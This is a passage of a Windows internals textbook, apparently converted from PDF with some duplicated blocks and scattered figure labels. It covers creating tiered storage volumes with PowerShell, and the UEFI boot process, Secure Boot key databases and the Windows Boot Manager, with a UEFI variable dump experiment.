DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B 137438953472 Unspecified True
1
Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 Unspecified True
0
Msft Virtual Disk 6002248048976A586FE149B00A43FC73 274877906944 Unspecified False
In this case, you should manually specify the type of disk by using the command
Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[<IDX>].UniqueID -MediaType <Type>,
where IDX is the row number in the previous output and MediaType is SSD or HDD, depending
IDX is the row number in the previous output and MediaType is SSD or HDD, depending
IDX
on the disk type. For example:
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[0].UniqueID -MediaType SSD
PS C:\> Set-PhysicalDisk -UniqueId (Get-PhysicalDisk)[1].UniqueID -MediaType HDD
PS C:\> Get-PhysicalDisk | FT DeviceId, FriendlyName, UniqueID, Size, MediaType, CanPool
DeviceId FriendlyName
UniqueID
Size MediaType CanPool
-------- ------------
--------
---- --------- -------
2
Msft Virtual Disk 600224802F4EE1E6B94595687DDE774B 137438953472 SSD
True
1
Msft Virtual Disk 60022480170766A9A808A30797285D77 1099511627776 HDD
True
0
Msft Virtual Disk 6002248048976A586FE149B00A43FC73 274877906944 Unspecified False
CHAPTER 11
Caching and file systems
775
At this stage you need to create the Storage pool, which is going to contain all the physical
disks that are going to compose the new virtual disk. You will then create the storage tiers. In this
example, we named the Storage Pool as DefaultPool:
PS C:\> New-StoragePool -StorageSubSystemId (Get-StorageSubSystem).UniqueId -FriendlyName
DeafultPool -PhysicalDisks (Get-PhysicalDisk -CanPool $true)
FriendlyName OperationalStatus HealthStatus IsPrimordial IsReadOnly Size AllocatedSize
------------ ----------------- ------------ ------------ ---------- ---- -------------
Pool OK Healthy False
1.12 TB
512 MB
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName SSD -MediaType SSD
...
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName HDD -MediaType HDD
...
Finally, we can create the virtual tiered volume by assigning it a name and specifying the
correct size of each tier. In this example, we create a tiered volume named TieredVirtualDisk
composed of a 120-GB performance tier and a 1,000-GB capacity tier:
PS C:\> $SSD = Get-StorageTier -FriendlyName SSD
PS C:\> $HDD = Get-StorageTier -FriendlyName HDD
PS C:\> Get-StoragePool Pool | New-VirtualDisk -FriendlyName "TieredVirtualDisk"
-ResiliencySettingName "Simple" -StorageTiers $SSD, $HDD -StorageTierSizes 128GB, 1000GB
...
PS C:\> Get-VirtualDisk | FT FriendlyName, OperationalStatus, HealthStatus, Size,
FootprintOnPool
FriendlyName
OperationalStatus HealthStatus
Size FootprintOnPool
------------
----------------- ------------
---- ---------------
TieredVirtualDisk OK
Healthy
1202590842880 1203664584704
After the virtual disk is created, you need to create the partitions and format the new volume
through standard means (such as by using the Disk Management snap-in or the Format tool).
After you complete volume formatting, you can verify whether the resulting volume is really a
tiered volume by using the fsutil.exe tool:
PS E:\> fsutil tiering regionList e:
Total Number of Regions for this volume: 2
Total Number of Regions returned by this operation: 2
Region # 0:
Tier ID: {448ABAB8-F00B-42D6-B345-C8DA68869020}
Name: TieredVirtualDisk-SSD
Offset: 0x0000000000000000
Length: 0x0000001dff000000
Region # 1:
Tier ID: {16A7BB83-CE3E-4996-8FF3-BEE98B68EBE4}
Name: TieredVirtualDisk-HDD
Offset: 0x0000001dff000000
Length: 0x000000f9ffe00000
At this stage you need to create the Storage pool, which is going to contain all the physical
disks that are going to compose the new virtual disk. You will then create the storage tiers. In this
example, we named the Storage Pool as DefaultPool:
PS C:\> New-StoragePool -StorageSubSystemId (Get-StorageSubSystem).UniqueId -FriendlyName
DeafultPool -PhysicalDisks (Get-PhysicalDisk -CanPool $true)
FriendlyName OperationalStatus HealthStatus IsPrimordial IsReadOnly Size AllocatedSize
------------ ----------------- ------------ ------------ ---------- ---- -------------
Pool OK Healthy False
1.12 TB
512 MB
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName SSD -MediaType SSD
...
PS C:\> Get-StoragePool DefaultPool | New-StorageTier -FriendlyName HDD -MediaType HDD
...
Finally, we can create the virtual tiered volume by assigning it a name and specifying the
correct size of each tier. In this example, we create a tiered volume named TieredVirtualDisk
composed of a 120-GB performance tier and a 1,000-GB capacity tier:
PS C:\> $SSD = Get-StorageTier -FriendlyName SSD
PS C:\> $HDD = Get-StorageTier -FriendlyName HDD
PS C:\> Get-StoragePool Pool | New-VirtualDisk -FriendlyName "TieredVirtualDisk"
-ResiliencySettingName "Simple" -StorageTiers $SSD, $HDD -StorageTierSizes 128GB, 1000GB
...
PS C:\> Get-VirtualDisk | FT FriendlyName, OperationalStatus, HealthStatus, Size,
FootprintOnPool
FriendlyName
OperationalStatus HealthStatus
Size FootprintOnPool
------------
----------------- ------------
---- ---------------
TieredVirtualDisk OK
Healthy
1202590842880 1203664584704
After the virtual disk is created, you need to create the partitions and format the new volume
through standard means (such as by using the Disk Management snap-in or the Format tool).
After you complete volume formatting, you can verify whether the resulting volume is really a
tiered volume by using the fsutil.exe tool:
PS E:\> fsutil tiering regionList e:
Total Number of Regions for this volume: 2
Total Number of Regions returned by this operation: 2
Region # 0:
Tier ID: {448ABAB8-F00B-42D6-B345-C8DA68869020}
Name: TieredVirtualDisk-SSD
Offset: 0x0000000000000000
Length: 0x0000001dff000000
Region # 1:
Tier ID: {16A7BB83-CE3E-4996-8FF3-BEE98B68EBE4}
Name: TieredVirtualDisk-HDD
Offset: 0x0000001dff000000
Length: 0x000000f9ffe00000
776
CHAPTER 11
Caching and file systems
Conclusion
Windows supports a wide variety of file system formats accessible to both the local system and remote
clients. The file system filter driver architecture provides a clean way to extend and augment file system
access, and both NTFS and ReFS provide a reliable, secure, scalable file system format for local file
system storage. Although ReFS is a relatively new file system, and implements some advanced features
designed for big server environments, NTFS was also updated with support for new device types and
new features (like the POSIX delete, online checkdisk, and encryption).
The cache manager provides a high-speed, intelligent mechanism for reducing disk I/O and increas-
ing overall system throughput. By caching on the basis of virtual blocks, the cache manager can perform
intelligent read-ahead, including on remote, networked file systems. By relying on the global memory
manager’s mapped file primitive to access file data, the cache manager can provide a special fast I/O
mechanism to reduce the CPU time required for read and write operations, while also leaving all matters
related to physical memory management to the Windows memory manager, thus reducing code dupli-
cation and increasing efficiency.
Through DAX and PM disk support, storage spaces and storage spaces direct, tiered volumes, and
SMR disk compatibility, Windows continues to be at the forefront of next-generation storage architec-
tures designed for high availability, reliability, performance, and cloud-level scale.
In the next chapter, we look at startup and shutdown in Windows.
777
C H A P T E R 1 2
Startup and shutdown
I
n this chapter, we describe the steps required to boot Windows and the options that can affect system
startup. Understanding the details of the boot process will help you diagnose problems that can
arise during a boot. We discuss the details of the new UEFI firmware, and the improvements brought
by it compared to the old historical BIOS. We present the role of the Boot Manager, Windows Loader,
NT kernel, and all the components involved in standard boots and in the new Secure Launch process,
which detects any kind of attack on the boot sequence. Then we explain the kinds of things that can
go wrong during the boot process and how to resolve them. Finally, we explain what occurs during an
orderly system shutdown.
Boot process
In describing the Windows boot process, we start with the installation of Windows and proceed through
the execution of boot support files. Device drivers are a crucial part of the boot process, so we explain
how they control the point in the boot process at which they load and initialize. Then we describe how the
executive subsystems initialize and how the kernel launches the user-mode portion of Windows by start-
ing the Session Manager process (Smss.exe), which starts the initial two sessions (session 0 and session 1).
Along the way, we highlight the points at which various on-screen messages appear to help you correlate
the internal process with what you see when you watch Windows boot.
The early phases of the boot process differ significantly on systems with an Extensible Firmware
Interface (EFI) versus the old systems with a BIOS (basic input/output system). EFI is a newer standard
that does away with much of the legacy 16-bit code that BIOS systems use and allows the loading of
preboot programs and drivers to support the operating system loading phase. EFI 2.0, which is known
as Unified EFI, or UEFI, is used by the vast majority of machine manufacturers. The next sections de-
scribe the portion of the boot process specific to UEFI-based machines.
To support these different firmware implementations, Windows provides a boot architecture that
abstracts many of the differences away from users and developers to provide a consistent environment
and experience regardless of the type of firmware used on the installed system.
The UEFI boot
The Windows boot process doesn’t begin when you power on your computer or press the reset but-
ton. It begins when you install Windows on your computer. At some point during the execution of the
Windows Setup program, the system’s primary hard disk is prepared in a way that both the Windows
778
CHAPTER 12
Startup and shutdown
Boot Manager and the UEFI firmware can understand. Before we get into what the Windows Boot
Manager code does, let’s have a quick look at the UEFI platform interface.
The UEFI is a set of software that provides the first basic programmatic interface to the platform.
With the term platform, we refer to the motherboard, chipset, central processing unit (CPU), and other
components that compose the machine “engine.” As Figure 12-1 shows, the UEFI specifications provide
four basic services that run in most of the available CPU architectures (x86, ARM, and so on). We use the
x86-64 architecture for this quick introduction:
I
Power on When the platform is powered on, the UEFI Security Phase handles the platform
restart event, verifies the Pre EFI Initialization modules’ code, and switches the processor from
16-bit real mode to 32-bit flat mode (still no paging support).
I
Platform initialization
The Pre EFI Initialization (PEI) phase initializes the CPU, the UEFI core’s
code, and the chipset and finally passes the control to the Driver Execution Environment (DXE)
phase. The DXE phase is the first code that runs entirely in full 64-bit mode. Indeed, the last PEI
module, called DXE IPL, switches the execution mode to 64-bit long mode. This phase searches
inside the firmware volume (stored in the system SPI flash chip) and executes each peripheral’s
startup drivers (called DXE drivers). Secure Boot, an important security feature that we talk about
later in this chapter in the “Secure Boot” section, is implemented as a UEFI DXE driver.
I
OS boot After the UEFI DXE phase ends, execution control is handed to the Boot Device
Selection (BDS) phase. This phase is responsible for implementing the UEFI Boot Loader. The
UEFI BDS phase locates and executes the Windows UEFI Boot Manager that the Setup program
has installed.
I
Shutdown The UEFI firmware implements some runtime services (available even to the OS)
that help in powering off the platform. Windows doesn’t normally make use of these functions
(relying instead on the ACPI interfaces).
Pre
Verifier
Processor
Init
Chipset
Init
Device,
Bus, or
Service
Driver
?
Device,
Bus, or
Service
Driver
Device,
Bus, or
Service
Driver
OS-Absent
App
Device,
Bus, or
Service
Driver
Device,
Bus, or
Service
Driver
Security
(SEC)
Power on
[ . . Platform initialization . . ]
[ . . . . OS boot . . . . ]
Shutdown
Pre EFI
Initialization
(PEI)
Driver Execution
Environment
(DXE)
Boot Dev
Select
(BDS)
Transient
System Load
(TSL)
Run Time
(RT)
After
Life
(AL)
Intrinsic
Services
Boot
Manager
UEFI
Interface
Transient OS
Boot Loader
Transient OS
Environment
OS-Present
App
Final OS Boot
Loader
Final OS
Environment
EFI Driver
Dispatcher
Board
Init
verify
FIGURE 12-1 The UEFI framework.
CHAPTER 12
Startup and shutdown
779
Describing the entire UEFI framework is beyond the scope of this book. After the UEFI BDS phase ends,
the firmware still owns the platform, making available the following services to the OS boot loader:
I
Boot services Provide basic functionality to the boot loader and other EFI applications, such
as basic memory management, synchronization, textual and graphical console I/O, and disk and
file I/O. Boot services implement some routines able to enumerate and query the installed “pro-
tocols” (EFI interfaces). These kinds of services are available only while the firmware owns the
platform and are discarded from memory after the boot loader has called the ExitBootServices
EFI runtime API.
I
Runtime services Provide date and time services, capsule update (firmware upgrading), and
methods able to access NVRAM data (such as UEFI variables). These services are still accessible
while the operating system is fully running.
I
Platform configuration data System ACPI and SMBIOS tables are always accessible through
the UEFI framework.
The UEFI Boot Manager can read and write from computer hard disks and understands basic file
systems like FAT, FAT32, and El Torito (for booting from a CD-ROM). The specifications require that the
boot hard disk be partitioned through the GPT (GUID partition table) scheme, which uses GUIDs to
identify different partitions and their roles in the system. The GPT scheme overcomes all the limitations
of the old MBR scheme and allows a maximum of 128 partitions, using a 64-bit LBA addressing mode
(resulting in a huge partition size support). Each partition is identified using a unique 128-bit GUID
value. Another GUID is used to identify the partition type. While UEFI defines only three partition types,
each OS vendor defines its own partition’s GUID types. The UEFI standard requires at least one EFI sys-
tem partition, formatted with a FAT32 file system.
The Windows Setup application initializes the disk and usually creates at least four partitions:
I
The EFI system partition, where it copies the Windows Boot Manager (Bootmgrfw.efi), the
memory test application (Memtest.efi), the system lockdown policies (for Device Guard-
enabled systems, Winsipolicy.p7b), and the boot resource file (Bootres.dll).
I
A recovery partition, where it stores the files needed to boot the Windows Recovery environ-
ment in case of startup problems (boot.sdi and Winre.wim). This partition is formatted using the
NTFS file system.
I
A Windows reserved partition, which the Setup tool uses as a fast, recoverable scratch area for
storing temporary data. Furthermore, some system tools use the Reserved partition for remapping
damaged sectors in the boot volume. (The reserved partition does not contain any file system.)
I
A boot partition—which is the partition on which Windows is installed and is not typically the
same as the system partition—where the boot files are located. This partition is formatted using
NTFS, the only supported file system that Windows can boot from when installed on a fixed disk.
The Windows Setup program, after placing the Windows files on the boot partition, copies the boot
manager in the EFI system partition and hides the boot partition content for the rest of the system. The
UEFI specification defines some global variables that can reside in NVRAM (the system’s nonvolatile
RAM) and are accessible even in the runtime phase when the OS has gained full control of the platform
780
CHAPTER 12
Startup and shutdown
(some other UEFI variables can even reside in the system RAM). The Windows Setup program con-
figures the UEFI platform for booting the Windows Boot Manager through the settings of some UEFI
variables (Boot000X one, where X is a unique number, depending on the boot load- option number,
and BootOrder). When the system reboots after setup ends, the UEFI Boot Manager is automatically
able to execute the Windows Boot Manager code.
Table 12-1 summarizes the files involved in the UEFI boot process. Figure 12-2 shows an example of a
hard disk layout, which follows the GPT partition scheme. (Files located in the Windows boot partition
are stored in the \Windows\System32 directory.)
TABLE 12-1 UEFI boot process components
Component
Responsibilities
Location
bootmgfw.efi
Reads the Boot Configuration Database (BCD), if required, pres-
ents boot menu, and allows execution of preboot programs
such as the Memory Test application (Memtest.efi).
EFI system partition
Winload.efi
Loads Ntoskrnl.exe and its dependencies (SiPolicy.p7b,
hvloader.dll, hvix64.exe, Hal.dll, Kdcom.dll, Ci.dll, Clfs.sys,
Pshed.dll) and bootstart device drivers.
Windows boot partition
Winresume.efi
If resuming after a hibernation state, resumes from the hiber-
nation file (Hiberfil.sys) instead of typical Windows loading.
Windows boot partition
Memtest.efi
If selected from the Boot Immersive Menu (or from the Boot
Manager), starts up and provides a graphical interface for scan-
ning memory and detecting damaged RAM.
EFI system partition
Hvloader.dll
If detected by the boot manager and properly enabled, this
module is the hypervisor launcher (hvloader.efi in the previous
Windows version).
Windows boot partition
Hvix64.exe (or hvax64.exe)
The Windows Hypervisor (Hyper-V). Depending on the proces-
sor architecture, this file could have different names. It’s the
basic component for Virtualization Based Security (VBS).
Windows boot partition
Ntoskrnl.exe
Initializes executive subsystems and boot and system-start
device drivers, prepares the system for running native applica-
tions, and runs Smss.exe.
Windows boot partition
Securekernel.exe
The Windows Secure Kernel. Provides the kernel mode services
for the secure VTL 1 World, and some basic communication
facility with the normal world (see Chapter 9, “Virtualization
Technologies”).
Windows boot partition
Hal.dll
Kernel-mode DLL that interfaces Ntoskrnl and drivers to the
hardware. It also acts as a driver for the motherboard, support-
ing soldered components that are not otherwise managed by
another driver.
Windows boot partition
Smss.exe
Initial instance starts a copy of itself to initialize each session.
The session 0 instance loads the Windows subsystem driver
(Win32k.sys) and starts the Windows subsystem process
(Csrss.exe) and Windows initialization process (Wininit.exe). All
other per-session instances start a Csrss and Winlogon process.
Windows boot partition
Wininit.exe
Starts the service control manager (SCM), the Local Security
Authority process (LSASS), and the local session manager
(LSM). Initializes the rest of the registry and performs usermode
initialization tasks.
Windows boot partition
Winlogon.exe
Coordinates log-on and user security; launches Bootim and
LogonUI.
Windows boot partition
CHAPTER 12
Startup and shutdown
781
Component
Responsibilities
Location
Logonui.exe
Presents interactive log on dialog screen.
Windows boot partition
Bootim.exe
Presents the graphical interactive boot menu.
Windows boot partition
Services.exe
Loads and initializes auto-start device drivers and Windows
services.
Windows boot partition
TcbLaunch.exe
Orchestrates the Secure Launch of the operating system in a
system that supports the new Intel TXT technology.
Windows boot partition
TcbLoader.dll
Contains the Windows Loader code that runs in the context of
the Secure Launch.
Windows boot partition
Protective
MBR
Primary
GPT
UEFI
system
partition
Windows
Recovery
petition
Reserved
partition
Windows Boot
Partition
GPT Protective partition
LBA 0
LBA z
Backup GPT
FIGURE 12-2 Sample UEFI hard disk layout.
Another of Setup’s roles is to prepare the BCD, which on UEFI systems is stored in the \EFI\Microsoft
\Boot\BCD file on the root directory of the system volume. This file contains options for starting
the version of Windows that Setup installs and any preexisting Windows installations. If the BCD
already exists, the Setup program simply adds new entries relevant to the new installation. For more
information on the BCD, see Chapter 10, “Management, diagnostics, and tracing.”
All the UEFI specifications, which include the PEI and BDS phase, secure boot, and many other
concepts, are available at https://uefi.org/specifications.
The BIOS boot process
Due to space issues, we don’t cover the old BIOS boot process in this edition of the book. The complete
description of the BIOS preboot and boot process is in Part 2 of the previous edition of the book.
Secure Boot
As described in Chapter 7 of Part 1, Windows was designed to protect against malware. All the old BIOS
systems were vulnerable to Advanced Persistent Threats (APT) that were using a bootkit to achieve
stealth and code execution. The bootkit is a particular type of malicious software that runs before
the Windows Boot Manager and allows the main infection module to run without being detected by
782
CHAPTER 12
Startup and shutdown
antivirus solutions. Initial parts of the BIOS bootkit normally reside in the Master Boot Record (MBR)
or Volume Boot Record (VBR) sector of the system hard disk. In this way, the old BIOS systems, when
switched on, execute the bootkit code instead of the main OS code. The OS original boot code is
encrypted and stored in other areas of the hard disk and is usually executed in a later stage by the mali-
cious code. This type of bootkit was even able to modify the OS code in memory during any Windows
boot phase.
As demonstrated by security researchers, the first releases of the UEFI specification were still vul-
nerable to this problem because the firmware, bootloader, and other components were not verified.
So, an attacker that has access to the machine could tamper with these components and replace the
bootloader with a malicious one. Indeed, any EFI application (executable files that follow the portable
executable or terse executable file format) correctly registered in the relative boot variable could have
been used for booting the system. Furthermore, even the DXE drivers were not correctly verified, al-
lowing the injection of a malicious EFI driver in the SPI flash. Windows couldn’t correctly identify the
alteration of the boot process.
This problem led the UEFI consortium to design and develop the secure boot technology. Secure
Boot is a feature of UEFI that ensures that each component loaded during the boot process is digitally
signed and validated. Secure Boot makes sure that the PC boots using only software that is trusted
by the PC manufacturer or the user. In Secure Boot, the firmware is responsible for the verification of
all the components (DXE drivers, UEFI boot managers, loaders, and so on) before they are loaded. If a
component doesn’t pass the validation, an error message is shown to the user and the boot process
is aborted.
The verification is performed through the use of public key algorithms (like RSA) for digital sign-
ing, against a database of accepted and refused certificates (or hashes) present in the UEFI firmware. In
these kind of algorithms, two different keys are employed:
I
A public key is used to decrypt an encrypted digest (a digest is a hash of the executable file
binary data). This key is stored in the digital signature of the file.
I
The private key is used to encrypt the hash of the binary executable file and is stored in a secure
and secret location. The digital signing of an executable file consists of three phases:
1.
Calculate the digest of the file content using a strong hashing algorithm, like SHA256. A
strong “hashing” should produce a message digest that is a unique (and relatively small)
representation of the complete initial data (a bit like a sophisticated checksum). Hashing
algorithms are a one-way encryption—that is, it’s impossible to derive the whole file from
the digest.
2.
Encrypt the calculated digest with the private portion of the key.
3.
Store the encrypted digest, the public portion of the key, and the name of the hashing
algorithm in the digital signature of the file.
In this way, when the system wants to verify and validate the integrity of the file, it recalculates the file
hash and compares it against the digest, which has been decrypted from the digital signature. Nobody ex-
cept the owner of the private key can modify or alter the encrypted digest stored into the digital signature.
CHAPTER 12
Startup and shutdown
783
This simplified model can be extended to create a chain of certificates, each one trusted by the firm-
ware. Indeed, if a public key located in a specific certificate is unknown by the firmware, but the certifi-
cate is signed another time by a trusted entity (an intermediate or root certificate), the firmware could
assume that even the inner public key must be considered trusted. This mechanism is shown in Figure
12-3 and is called the chain of trust. It relies on the fact that a digital certificate (used for code signing)
can be signed using the public key of another trusted higher-level certificate (a root or intermediate
certificate). The model is simplified here because a complete description of all the details is outside the
scope of this book.
reference
End-entity Certificate
Owner’s name
Issuer’s signature
Owner’s public key
Issuer’s (CA’s)
name
Intermediate Certificate
reference
sign
sign
self-sign
Owner’s (CA’s) name
Issuer’s signature
Owner’s public key
Issuer’s (root CA’s)
name
Root Certificate
Root CA’s name
Root CA’s signature
Root CA’s public key
FIGURE 12-3 A simplified representation of the chain of trust.
The allowed/revoked UEFI certificates and hashes have to establish some hierarchy of trust by using
the entities shown in Figure 12-4, which are stored in UEFI variables:
I
Platform key (PK) The platform key represents the root of trust and is used to protect the
key exchange key (KEK) database. The platform vendor puts the public portion of the PK into
UEFI firmware during manufacturing. Its private portion stays with the vendor.
I
Key exchange key (KEK) The key exchange key database contains trusted certificates that
are allowed to modify the allowed signature database (DB), disallowed signature database
(DBX), or timestamp signature database (DBT). The KEK database usually contains certificates of
the operating system vendor (OSV) and is secured by the PK.
Hashes and signatures used to verify bootloaders and other pre-boot components are stored in
three different databases. The allowed signature database (DB) contains hashes of specific binaries
or certificates (or their hashes) that were used to generate code-signing certificates that have signed
bootloader and other preboot components (following the chain of trust model). The disallowed signa-
ture database (DBX) contains the hashes of specific binaries or certificates (or their hashes) that were
784
CHAPTER 12
Startup and shutdown
compromised and/or revoked. The timestamp signature database (DBT) contains timestamping certifi-
cates used when signing bootloader images. All three databases are locked from editing by the KEK.
KEK–Key exchange key
database
PK–Platform key
DB–allowed signatures
database
DBX–revoked
signatures database
DBT–timestamping
database
FIGURE 12-4 The certificate the chain of trust used in the UEFI Secure Boot.
To properly seal Secure Boot keys, the firmware should not allow their update unless the entity
attempting the update can prove (with a digital signature on a specified payload, called the authenti-
cation descriptor) that they possess the private part of the key used to create the variable. This mecha-
nism is implemented in UEFI through the Authenticated Variables. At the time of this writing, the UEFI
specifications allow only two types of signing keys: X509 and RSA2048. An Authenticated Variable may
be cleared by writing an empty update, which must still contain a valid authentication descriptor. When
an Authenticated Variable is first created, it stores both the public portion of the key that created it and
the initial value for the time (or a monotonic count) and will accept only subsequent updates signed
with that key and which have the same update type. For example, the KEK variable is created using the
PK and can be updated only by an authentication descriptor signed with the PK.
Note The way in which the UEFI firmware uses the Authenticated Variables in Secure Boot
environments could lead to some confusion. Indeed, only the PK, KEK, and signatures data-
bases are stored using Authenticated Variables. The other UEFI boot variables, which store
boot configuration data, are still regular runtime variables. This means that in a Secure Boot
environment, a user is still able to update or change the boot configuration (modifying even
the boot order) without any problem. This is not an issue, because the secure verification
is always made on every kind of boot application (regardless of its source or order). Secure
Boot is not designed to prevent the modification of the system boot configuration.
CHAPTER 12
Startup and shutdown
785
The Windows Boot Manager
As discussed previously, the UEFI firmware reads and executes the Windows Boot Manager (Bootmgfw.efi).
The EFI firmware transfers control to Bootmgr in long mode with paging enabled, and the memory
space defined by the UEFI memory map is mapped one to one. So, unlike wBIOS systems, there’s no
need to switch execution context. The Windows Boot Manager is indeed the first application that’s
invoked when starting or resuming the Windows OS from a completely off power state or from hiber-
nation (S4 power state). The Windows Boot Manager has been completely redesigned starting from
Windows Vista, with the following goals:
I
Support the boot of different operating systems that employ complex and various boot
technologies.
I
Separate the OS-specific startup code in its own boot application (named Windows Loader)
and the Resume application (Winresume).
I
Isolate and provide common boot services to the boot applications. This is the role of the
boot libraries.
Even though the final goal of the Windows Boot Manager seems obvious, its entire architecture is
complex. From now on, we use the term boot application to refer to any OS loader, such as the Windows
Loader and other loaders. Bootmgr has multiple roles, such as the following:
I
Initializes the boot logger and the basic system services needed for the boot application
(which will be discussed later in this section)
I
Initializes security features like Secure Boot and Measured Boot, loads their system policies,
and verifies its own integrity
I
Locates, opens, and reads the Boot Configuration Data store
I
Creates a “boot list” and shows a basic boot menu (if the boot menu policy is set to Legacy)
I
Manages the TPM and the unlock of BitLocker-encrypted drives (showing the BitLocker unlock
screen and providing a recovery method in case of problems getting the decryption key)
I
Launches a specific boot application and manages the recovery sequence in case the boot has
failed (Windows Recovery Environment)
One of the first things performed is the configuration of the boot logging facility and initialization of
the boot libraries. Boot applications include a standard set of libraries that are initialized at the start of
the Boot Manager. Once the standard boot libraries are initialized, then their core services are available
to all boot applications. These services include a basic memory manager (that supports address transla-
tion, and page and heap allocation), firmware parameters (like the boot device and the boot manager
entry in the BCD), an event notification system (for Measured Boot), time, boot logger, crypto modules,
the Trusted Platform Module (TPM), network, display driver, and I/O system (and a basic PE Loader). The
reader can imagine the boot libraries as a special kind of basic hardware abstraction layer (HAL) for the
Boot Manager and boot applications. In the early stages of library initialization, the System Integrity
boot library component is initialized. The goal of the System Integrity service is to provide a platform
for reporting and recording security-relevant system events, such as loading of new code, attaching a
786
CHAPTER 12
Startup and shutdown
debugger, and so on. This is achieved using functionality provided by the TPM and is used especially for
Measured Boot. We describe this feature later in the chapter in the “Measured Boot” section.
To properly execute, the Boot Manager initialization function (BmMain) needs a data structure
called Application Parameters that, as the name implies, describes its startup parameters (like the
Boot Device, BCD object GUID, and so on). To compile this data structure, the Boot Manager uses the
EFI firmware services with the goal of obtaining the complete relative path of its own executable and
getting the startup load options stored in the active EFI boot variable (BOOT000X). The EFI specifica-
tions dictate that an EFI boot variable must contain a short description of the boot entry, the complete
device and file path of the Boot Manager, and some optional data. Windows uses the optional data to
store the GUID of the BCD object that describes itself.
Note The optional data could include any other boot options, which the Boot Manager will
parse at later stages. This allows the configuration of the Boot Manager from UEFI variables
without using the Windows Registry at all.
EXPERIMENT: Playing with the UEFI boot variables
You can use the UefiTool utility (found in this book’s downloadable resources) to dump all the
UEFI boot variables of your system. To do so, just run the tool in an administrative command
prompt and specify the /enum command-line parameter. (You can launch the command
prompt as administrator by searching cmd in the Cortana search box and selecting Run As
Administrator after right-clicking Command Prompt.) A regular system uses a lot of UEFI vari-
ables. The tool supports filtering all the variables by name and GUID. You can even export all the
variable names and data in a text file using the /out parameter.
Start by dumping all the UEFI variables in a text file:
C:\Tools>UefiTool.exe /enum /out Uefi_Variables.txt
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
Successfully written “Uefi_Variables.txt” file.
You can get the list of UEFI boot variables by using the following filter:
C:\Tools>UefiTool.exe /enum Boot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
EXPERIMENT: Playing with the UEFI boot variables
You can use the UefiTool utility (found in this book’s downloadable resources) to dump all the
UEFI boot variables of your system. To do so, just run the tool in an administrative command
prompt and specify the /enum command-line parameter. (You can launch the command
prompt as administrator by searching cmd in the Cortana search box and selecting
cmd in the Cortana search box and selecting
cmd
Run As
Administrator after right-clicking Command Prompt.) A regular system uses a lot of UEFI vari-
ables. The tool supports filtering all the variables by name and GUID. You can even export all the
variable names and data in a text file using the /out parameter.
Start by dumping all the UEFI variables in a text file:
C:\Tools>UefiTool.exe /enum /out Uefi_Variables.txt
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
Successfully written “Uefi_Variables.txt” file.
You can get the list of UEFI boot variables by using the following filter:
C:\Tools>UefiTool.exe /enum Boot
UEFI Dump Tool v0.1
Copyright 2018 by Andrea Allievi (AaLl86)
Firmware type: UEFI
Bitlocker enabled for System Volume: NO
CHAPTER 12
Startup and shutdown
787
EFI Variable “BootCurrent”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x06 ( BS RT )
Data size : 2 bytes
Data:
00 00
|
EFI Variable “Boot0002”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 78 bytes
Data:
01 00 00 00 2C 00 55 00 53 00 42 00 20 00 53 00 | , U S B S
74 00 6F 00 72 00 61 00 67 00 65 00 00 00 04 07 | t o r a g e
14 00 67 D5 81 A8 B0 6C EE 4E 84 35 2E 72 D3 3E | gü¿lNä5.r>
45 B5 04 06 14 00 71 00 67 50 8F 47 E7 4B AD 13 | Eq gPÅGK¡
87 54 F3 79 C6 2F 7F FF 04 00 55 53 42 00 | çT≤y/ USB
EFI Variable “Boot0000”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 300 bytes
Data:
01 00 00 00 74 00 57 00 69 00 6E 00 64 00 6F 00 | t W I n d o
77 00 73 00 20 00 42 00 6F 00 6F 00 74 00 20 00 | w s B o o t
4D 00 61 00 6E 00 61 00 67 00 65 00 72 00 00 00 | M a n a g e r
04 01 2A 00 02 00 00 00 00 A0 0F 00 00 00 00 00 | * á
00 98 0F 00 00 00 00 00 84 C4 AF 4D 52 3B 80 44 | ÿ ä»MR;ÇD
98 DF 2C A4 93 AB 30 B0 02 02 04 04 46 00 5C 00 | ÿ,ñô½0F \
45 00 46 00 49 00 5C 00 4D 00 69 00 63 00 72 00 | E F I \ M i c r
6F 00 73 00 6F 00 66 00 74 00 5C 00 42 00 6F 00 | o s o f t \ B o
6F 00 74 00 5C 00 62 00 6F 00 6F 00 74 00 6D 00 | o t \ b o o t m
67 00 66 00 77 00 2E 00 65 00 66 00 69 00 00 00 | g f w . e f i
7F FF 04 00 57 49 4E 44 4F 57 53 00 01 00 00 00 | WINDOWS
88 00 00 00 78 00 00 00 42 00 43 00 44 00 4F 00 | ê x B C D O
42 00 4A 00 45 00 43 00 54 00 3D 00 7B 00 39 00 | B J E C T = { 9
64 00 65 00 61 00 38 00 36 00 32 00 63 00 2D 00 | d e a 8 6 2 c -
35 00 63 00 64 00 64 00 2D 00 34 00 65 00 37 00 | 5 c d d - 4 e 7
30 00 2D 00 61 00 63 00 63 00 31 00 2D 00 66 00 | 0 - a c c 1 - f
33 00 32 00 62 00 33 00 34 00 34 00 64 00 34 00 | 3 2 b 3 4 4 d 4
37 00 39 00 35 00 7D 00 00 00 6F 00 01 00 00 00 | 7 9 5 } o
10 00 00 00 04 00 00 00 7F FF 04 00
|
EFI Variable "BootOrder"
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
Attributes: 0x07 ( NV BS RT )
Data size : 8 bytes
Data:
02 00 00 00 01 00 03 00
|
<Full output cut for space reasons>
EFI Variable “BootCurrent”
Guid
: {8BE4DF61-93CA-11D2-AA0D-00E098032B8C}
